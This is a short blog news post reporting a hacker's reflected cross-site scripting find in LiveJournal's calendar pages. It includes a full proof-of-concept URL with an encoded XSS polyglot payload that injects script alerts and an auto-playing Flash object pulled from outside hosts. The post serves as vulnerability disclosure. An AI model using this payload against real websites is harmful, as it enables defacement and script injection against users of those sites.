Search This Blog

Popular Posts

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Sony Hacker. Show all posts
XSS Vulnerability
Sony Hacker Vulnerability Web Application Vulnerability XSS Vulnerability

Livejournal.com Vulnerable to Cross Site Scripting(xss) ~found by Sony


After interesting XSS find , Hacker sony(inSecurity.Ro Team) come with more interesting XSS find; This time he discovered XSS vulnerability in LiveJournal official website.

LiveJournal is a vibrant global social media platform where users share common passions and interests. Hacker claimed he found XSS in the calendar of Livejournal.com and it took only 5 minutes to discover security flaw.

Demo:
http://lj-support.livejournal.com/2012/02/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/peo/det/dety38.jpg%22%3E%3Cscript%3Ealert%28%22inSecurity.Ro%20Presents:Cross%20Site%20Scripting%20-Don%27t%20Cry..create%20by%20Sony%22%29%3C/script%3E%20%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=http://www.audiopoisk.com/files/no/guns-n-roses---guns-n-roses---13---dont-cry-398865.mp3&autostart=yes%22%3E%3C/object%3E

Read more »
Subscribe to: Comments (Atom)